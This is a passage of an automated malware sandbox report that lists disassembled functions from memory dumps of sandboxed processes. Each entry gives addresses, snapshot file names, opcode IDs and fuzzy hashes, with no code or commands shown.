                                                                                            • Instruction Fuzzy Hash: 2251FBB0D18A5D8FDF94EFA8C9546EDBBB2FF58301F14412AD409E7295CB345845CB40
                                                                                            Function 00007FFB4B2A38B8 Relevance: .2, Instructions: 151COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d8a6d20f82a72f54a6ff2dedc6be5096850c465f74d74daa8d673b32b3a9e6f4
                                                                                            • Instruction ID: 46c78495da2a3e149eb9c35c30381778a9b39a5b2a8b8d1e88b63c61a5e38840
                                                                                            • Opcode Fuzzy Hash: d8a6d20f82a72f54a6ff2dedc6be5096850c465f74d74daa8d673b32b3a9e6f4
                                                                                            • Instruction Fuzzy Hash: CD419AB0A1C91D8FDB45EFA8D845AEEBBB1FF58300F1001BAE409E7295DA35A9018B51
                                                                                            Function 00007FFB4B2A67ED Relevance: .1, Instructions: 142COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 85483994d43c93b59ac444c0e65b7d949cb6127c39f659df26af63db8b194771
                                                                                            • Instruction ID: 5b31a6443313be1147bfb45b4d32ecb998da8439409f126371753796448815b1
                                                                                            • Opcode Fuzzy Hash: 85483994d43c93b59ac444c0e65b7d949cb6127c39f659df26af63db8b194771
                                                                                            • Instruction Fuzzy Hash: F651697180D28A8FDB56EF74C8A52FEBBB0EF1A300F0545BAD505E7192DB385A48CB51
                                                                                            Function 00007FFB4B2A0C6D Relevance: .1, Instructions: 125COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fbb096994bb4f416965765246029d4fd59a385a952961243060f55d4404461b1
                                                                                            • Instruction ID: 5dd1e6b9c437241f6360db80c73b5612ca333c7e40eedac8029b6c58ddd3b715
                                                                                            • Opcode Fuzzy Hash: fbb096994bb4f416965765246029d4fd59a385a952961243060f55d4404461b1
                                                                                            • Instruction Fuzzy Hash: CC4127B1C09A1D8FDB55EFB4D4486EEBBB1FF19300F50057AE409E3192DA78A945CB80
                                                                                            Function 00007FFB4B2A1521 Relevance: .1, Instructions: 120COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6733d296242cf56c1ee9ea70c5c52d2c4ff8980d09ab146ea6bc6d55efa482d5
                                                                                            • Instruction ID: 4c421fe0df8d6ea25e6bf716aec7ad76b5ec9c5437eb9d75024a5ac02cc54d90
                                                                                            • Opcode Fuzzy Hash: 6733d296242cf56c1ee9ea70c5c52d2c4ff8980d09ab146ea6bc6d55efa482d5
                                                                                            • Instruction Fuzzy Hash: 4441F974A1891D8FDFA8EF68D895BACB7F1FB58705F5480A9D04EE3251CE74AC818B40
                                                                                            Function 00007FFB4B2A0AD0 Relevance: .1, Instructions: 113COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 969213f17d58af67b629abeeedb09acc8e76da1b4d14e635bcf618f74b2f2b41
                                                                                            • Instruction ID: a9cb4e365ad23b9831725f4aa03d4e575c30127b084bcf6bb78e917607037863
                                                                                            • Opcode Fuzzy Hash: 969213f17d58af67b629abeeedb09acc8e76da1b4d14e635bcf618f74b2f2b41
                                                                                            • Instruction Fuzzy Hash: 2631CB7091891D8FDF94EF68C955BEEBBB2FF98301F10452AD509E7295CB34A845CB80
                                                                                            Function 00007FFB4B2A4BE9 Relevance: .1, Instructions: 103COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 22c5ebc4f5855224326c482726cfaa16431ea6df4a91db8c562eb21d5b4350ce
                                                                                            • Instruction ID: bd7723ae5c2bf192ff54c2cf615c6a19961a05cb90a7f362ab9b7c24c5ad6cdb
                                                                                            • Opcode Fuzzy Hash: 22c5ebc4f5855224326c482726cfaa16431ea6df4a91db8c562eb21d5b4350ce
                                                                                            • Instruction Fuzzy Hash: 24417BB0D096598FEB45EFB4C8596EDBBB2FF49301F4041BAD009D76A2CB389881CB00
                                                                                            Function 00007FFB4B2A4535 Relevance: .1, Instructions: 103COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 73f4ce737ef126c1d83a3028884fb9910ba3e7f7405c40424e9f83d75e6a23e8
                                                                                            • Instruction ID: e3d8ea06d633098d2bdc5352ee8a76077629e443008428c250aed56102df1b24
                                                                                            • Opcode Fuzzy Hash: 73f4ce737ef126c1d83a3028884fb9910ba3e7f7405c40424e9f83d75e6a23e8
                                                                                            • Instruction Fuzzy Hash: 4B3127A181DACA8FEB51FF3CC8241E97FA0FF5A314F4541BAE98887593CA249845C781
                                                                                            Function 00007FFB4B2A1129 Relevance: .1, Instructions: 90COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ab3c4043a5350e0636dc6479564d84f2b6ffb071bfbb2db9415e78b54138a123
                                                                                            • Instruction ID: 4a118f80d29acffadd2620a9fba48b8696279ebd510abe360731b6b5fe250a76
                                                                                            • Opcode Fuzzy Hash: ab3c4043a5350e0636dc6479564d84f2b6ffb071bfbb2db9415e78b54138a123
                                                                                            • Instruction Fuzzy Hash: 28217CB1908A5D8FDB81EF68D845AEDBFF1FF59311F00016AE408E72A2CA2498518790
                                                                                            Function 00007FFB4B2A3F00 Relevance: .1, Instructions: 85COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6d1563f4e189de257449d5a91e86e835568cb1a58dd03760ffc05d03b16719d3
                                                                                            • Instruction ID: 432b2cf65856f07ee614a3a6a66f1d6796b3a3c403ab108cc8ef2047a92d172e
                                                                                            • Opcode Fuzzy Hash: 6d1563f4e189de257449d5a91e86e835568cb1a58dd03760ffc05d03b16719d3
                                                                                            • Instruction Fuzzy Hash: E3313C70D1961A8BE7A9EF34C5593B9B7A1EF58300F1045B9D95DE32E2CE38A981CB40
                                                                                            Function 00007FFB4B2A3F0B Relevance: .1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 56248432fb69ac0a677232e4dae62dab6d2cca0cb5f92820c0fc40843c77e8a0
                                                                                            • Instruction ID: e5071992ebbd2b7bf7938c3c68a92fc153c802d39167efd51e264a03ea8cc777
                                                                                            • Opcode Fuzzy Hash: 56248432fb69ac0a677232e4dae62dab6d2cca0cb5f92820c0fc40843c77e8a0
                                                                                            • Instruction Fuzzy Hash: 112195B1D1D60A8BE768FF74C5456B9BBB1EF88310F104079D51D935E2DE38A941CB40
                                                                                            Function 00007FFB4B2A1048 Relevance: .1, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 523eacced990334f353bbaf829b7e0b5ee1de86401848d54d1ef95ec8d53d481
                                                                                            • Instruction ID: a90961b2d0e2d26900273c7c05e8c916fe639d1a0274d860fb21a809bbc7d84f
                                                                                            • Opcode Fuzzy Hash: 523eacced990334f353bbaf829b7e0b5ee1de86401848d54d1ef95ec8d53d481
                                                                                            • Instruction Fuzzy Hash: 45219F74A1891D8FDF84EF98D495EEEBBB1FF6C301F10416AE50AE3255CA34E8418B90
                                                                                            Function 00007FFB4B2A3F43 Relevance: .1, Instructions: 71COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6ef1a7b38da4eca1f9a4612c545b2a319db310a3dfadde5a8d8c3bf78c204537
                                                                                            • Instruction ID: 076480a7b0ea5822112c9a8fb66e2d8260d65a5178a86c537296de41b80a8a20
                                                                                            • Opcode Fuzzy Hash: 6ef1a7b38da4eca1f9a4612c545b2a319db310a3dfadde5a8d8c3bf78c204537
                                                                                            • Instruction Fuzzy Hash: 38214C7090E7498FE769EF68C8197B9BBB1EF49310F0401BAD509D32D2DE38A845CB51
                                                                                            Function 00007FFB4B2A3FC1 Relevance: .1, Instructions: 64COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fee431c335face6f7a6937469221c3395702ab4457be69afcd241e7c5da89ef0
                                                                                            • Instruction ID: 9e635a9282343df4108c5cc148ec0bc522cf127d5a1cd3b3710e20dd89dcefdb
                                                                                            • Opcode Fuzzy Hash: fee431c335face6f7a6937469221c3395702ab4457be69afcd241e7c5da89ef0
                                                                                            • Instruction Fuzzy Hash: 66117F7090D7894FE76AAF74C4157B97FB1AF46310F0440BAD449D71D3CD689845C751
                                                                                            Function 00007FFB4B2A3F62 Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 68ec592a14293e49d658064820d317198f1daed43a3aed5d081ad96bbd65d7d5
                                                                                            • Instruction ID: 920d0dc990f740f35aed7ca2cafa6bcf9a5334bc62c32d04559868c48f5a3bd7
                                                                                            • Opcode Fuzzy Hash: 68ec592a14293e49d658064820d317198f1daed43a3aed5d081ad96bbd65d7d5
                                                                                            • Instruction Fuzzy Hash: BF11A770D1D64E8BE768FE38C5057BABAF1EF99310F104579D51EE32E1DE38A8058A41
                                                                                            Function 00007FFB4B2A3F86 Relevance: .1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 57696c6e970e79fa9c668b586c277fbf1eb16ffade9e523dfa72205350711e0d
                                                                                            • Instruction ID: b3cb579de386dbb07c29ec947e376e2e6846742c01ff3b30853f2d123777988b
                                                                                            • Opcode Fuzzy Hash: 57696c6e970e79fa9c668b586c277fbf1eb16ffade9e523dfa72205350711e0d
                                                                                            • Instruction Fuzzy Hash: C81182B0D1D64A8BE7A9FF38C5053B97AA1EF88300F144079D51DE36E2DE38A841C704
                                                                                            Function 00007FFB4B2A3EEC Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bad080a95fa0f6bba1e13db12a906c3fd695bad6b97ea7c9f2ff5ccbbe788a3f
                                                                                            • Instruction ID: 28577010ba02cc524a275a7d00b2fa2b9ae95f9ba974aa39cdefc3f56dfc9908
                                                                                            • Opcode Fuzzy Hash: bad080a95fa0f6bba1e13db12a906c3fd695bad6b97ea7c9f2ff5ccbbe788a3f
                                                                                            • Instruction Fuzzy Hash: 0A1191B0D1DB4A8FE769AF38C5193B9BBB1AF49310F0450BAD519D32E2DE2898419705
                                                                                            Function 00007FFB4B2A3F74 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 02c97dedaca905503bd0a2b68ef11f93b4c443c08b74a3a02eff188d7b803299
                                                                                            • Instruction ID: 17c23a7e301075283bd7a1522903e60ac8fe4f6084958b450f27f8484a166b01
                                                                                            • Opcode Fuzzy Hash: 02c97dedaca905503bd0a2b68ef11f93b4c443c08b74a3a02eff188d7b803299
                                                                                            • Instruction Fuzzy Hash: B711A5B0D1DA4A8BE769BE38C5153B9BAE1EF48310F14443AD50EE36D1CE38A8418644
                                                                                            Function 00007FFB4B2A3F6B Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 864618a2dd329ec8406ef57769855565d74d0e1fc8bacdb47272d91f94db4f1e
                                                                                            • Instruction ID: 757f30e5b22f396cff786ff3d8ad716f75614ff32598c6b73b9c7c6dd7f4c913
                                                                                            • Opcode Fuzzy Hash: 864618a2dd329ec8406ef57769855565d74d0e1fc8bacdb47272d91f94db4f1e
                                                                                            • Instruction Fuzzy Hash: 8301C4B090E74A8FE769EF34C5153B9BBA1EF49300F044479D40AE36D2DE38A841DB05
                                                                                            Function 00007FFB4B2A6680 Relevance: .0, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bff99195625516614f3a79731241bf207a5f1d7725148a31f4b47846c8b00416
                                                                                            • Instruction ID: ccc8eed372c7ae74f52ece42e248e1a25c5a3109653ebd15bb3ac23e9b9965aa
                                                                                            • Opcode Fuzzy Hash: bff99195625516614f3a79731241bf207a5f1d7725148a31f4b47846c8b00416
                                                                                            • Instruction Fuzzy Hash: E101DC31848A0C8BCB55AF2A9C002887BB4FB9E318F00126AD44CD7180D3369A9AC741
                                                                                            Function 00007FFB4B2A10EA Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b29c24ffe5005c856c3af2135e5ef0bc6033e99fdf3e60683c6e4ed2bf4daf5e
                                                                                            • Instruction ID: 1456b1ddb5b6e9484af422dfa55523db19b662147d1aa6cd24da2ec648f7b865
                                                                                            • Opcode Fuzzy Hash: b29c24ffe5005c856c3af2135e5ef0bc6033e99fdf3e60683c6e4ed2bf4daf5e
                                                                                            • Instruction Fuzzy Hash: 71E0683680CA4C4BDB90FE68E8066A5FFE0FBCE318F00006DE64CD3091C324955AC380
                                                                                            Function 00007FFB4B2A09D3 Relevance: .0, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d87df9d8c2ec9e1f81ce544174cb6c5580de01206f2a4787a49d0f160693683e
                                                                                            • Instruction ID: 5e76d037c73f7afd5ac58b2ca922ede1b1e77f11735d8be66571cc2f1c3a3ad1
                                                                                            • Opcode Fuzzy Hash: d87df9d8c2ec9e1f81ce544174cb6c5580de01206f2a4787a49d0f160693683e
                                                                                            • Instruction Fuzzy Hash: B0E04F71928A1E4FDB88FF68D8855FDB7A2FF88300B004439D10DE3151CA206C04C780

                                                                                            Non-executed Functions

                                                                                            Function 00007FFB4B2A57F2 Relevance: 6.5, Strings: 5, Instructions: 243COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0O4K$@O4K$PO4K$`O4K$pP4K
                                                                                            • API String ID: 0-183661772
                                                                                            • Opcode ID: fd36709a27cd372fce4e76f8fee9d7562e53257a54aaf0bc81f460c3ac511de2
                                                                                            • Instruction ID: 2c633c7f8829b94442ea81b4e7f7ddd9c7a346a892011dc28556f5ab1e2e5617
                                                                                            • Opcode Fuzzy Hash: fd36709a27cd372fce4e76f8fee9d7562e53257a54aaf0bc81f460c3ac511de2
                                                                                            • Instruction Fuzzy Hash: 4651F987B0F6DA0FE31679BCBC510E9BF90EF862B534943F7D1888A0A7AC15494A42D1

                                                                                            Executed Functions

                                                                                            Function 00007FFB4B2B27F6 Relevance: 2.7, Strings: 2, Instructions: 220COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: [$]
                                                                                            • API String ID: 0-2073744556
                                                                                            • Opcode ID: d383e946ca880d1ea10b70a06dcf3c41e2c1166d289063e0686450814a8cb9c1
                                                                                            • Instruction ID: 78b1e40126a56d59c447ea2f07ba13770f19848e9266517628988a9b087ec8ed
                                                                                            • Opcode Fuzzy Hash: d383e946ca880d1ea10b70a06dcf3c41e2c1166d289063e0686450814a8cb9c1
                                                                                            • Instruction Fuzzy Hash: B7810B70918A5D8FDBA9EF28C8856E9BBB5EF58301F1041EED40DD7291CE35AA81CF50
                                                                                            Function 00007FFB4B2B1250 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: b291b04e7ac88c749fe4d45e72275c2103959684643643a2137d9b77b3a94c3a
                                                                                            • Instruction ID: 8434bfa535270f7961f9d18437a262bdc0b7ca3d56fe46d9fa7287d73f4a2a83
                                                                                            • Opcode Fuzzy Hash: b291b04e7ac88c749fe4d45e72275c2103959684643643a2137d9b77b3a94c3a
                                                                                            • Instruction Fuzzy Hash: 3FA19374A18A1C8FDB98EF58C894BA8BBF1FF69301F4541A9D00DE7265DB74AC81CB41
                                                                                            Function 00007FFB4B2B3A8D Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: H#5K
                                                                                            • API String ID: 0-114298329
                                                                                            • Opcode ID: d29165f2d429c04c8c870887ed9d1d3c171a07221d42094038888a1a771c2d18
                                                                                            • Instruction ID: c66baf9fa51a96458dc88c56343c561ee74ded1feea030189684a86d034fd4eb
                                                                                            • Opcode Fuzzy Hash: d29165f2d429c04c8c870887ed9d1d3c171a07221d42094038888a1a771c2d18
                                                                                            • Instruction Fuzzy Hash: FE21AEB1A0D68E4FEB95FE38C8646E6BBA1FF56301F0540BDC148C71A6DE75A841C740
                                                                                            Function 00007FFB4B2B1751 Relevance: .4, Instructions: 385COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 675415e4ae6ae250e0c071fcec563c88346f54cb45bf6820058fefc7777a24d2
                                                                                            • Instruction ID: 76dd3bae8e360d20ad90080a2a3d7f3f6831e49f1e21ebe58f1d0c982504c50c
                                                                                            • Opcode Fuzzy Hash: 675415e4ae6ae250e0c071fcec563c88346f54cb45bf6820058fefc7777a24d2
                                                                                            • Instruction Fuzzy Hash: 48D16CB1D1D6998FDB99EF64C8957E8BBE1EF48301F0440BED049E7292CE386885CB51
                                                                                            Function 00007FFB4B2B4843 Relevance: .2, Instructions: 248COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1ab0019ba549ccc499caa79555308f132da38b0314e964173bebb767da4d2ca7
                                                                                            • Instruction ID: 4c6c67389b092694588a0dabbbaf3537e1e441f5289b7f56712727f8e1274cc3
                                                                                            • Opcode Fuzzy Hash: 1ab0019ba549ccc499caa79555308f132da38b0314e964173bebb767da4d2ca7
                                                                                            • Instruction Fuzzy Hash: A191D2B0D18A1D8FDB95EFA8C8957EDBBB1FF58301F1041AAD40DE3252DE34A9858B40
                                                                                            Function 00007FFB4B2B4380 Relevance: .2, Instructions: 231COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000036.00000002.2169959698.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_54_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c9dd6aa54abe172b3de145f34a9df0fee224eacc8c46ac4e68400933ba4a6c3d
                                                                                            • Instruction ID: d99d6d1d0037d154f4a81d3685c3b7ae9813497ba18393f966ccae09a0e3f99d
                                                                                            • Opcode Fuzzy Hash: c9dd6aa54abe172b3de145f34a9df0fee224eacc8c46ac4e68400933ba4a6c3d
                                                                                            • Instruction Fuzzy Hash: E48107D2C1DEC24BE31ABF7CD9A11B97FB1AF52314B1880BED698861E7DD1868158381
